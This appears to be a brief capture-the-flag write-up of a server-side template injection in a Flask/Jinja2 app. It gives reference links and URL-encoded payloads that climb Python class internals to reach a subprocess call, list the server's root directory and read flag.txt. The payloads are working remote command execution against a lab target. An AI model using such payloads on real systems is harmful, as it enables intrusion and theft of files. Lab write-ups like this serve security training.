# SSTI Vuln (Flask/Jinja2)

Time elapsed = Approx. 2 hours

## Resources

https://docs.python.org/release/2.6.4/library/stdtypes.html#class.__mro__

https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/
https://portswigger.net/web-security/server-side-template-injection
https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

## Execution


http://178.128.40.217:32594/{{get_flashed_messages.__class__.__mro__[1].__subclasses__()}}

All dir in machine

Payload `http://178.128.40.217:32594/%7B%7Bg.__class__.__mro__[1].__subclasses__()[414]('ls',shell=True,stdout=-1).communicate()%7D%7D`
Return 

`Error 404
The page '(b'bin\nboot\ndev\netc\nflag.txt\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\n', None)' could not be found
`


flag is found at

http://178.128.40.217:32594/%7B%7Bg.__class__.__mro__[1].__subclasses__()[414]('cat%20flag.txt',shell=True,stdout=-1).communicate()%7D%7D

URL decode
- %20 = white space
- %7B = {
- %7D = }
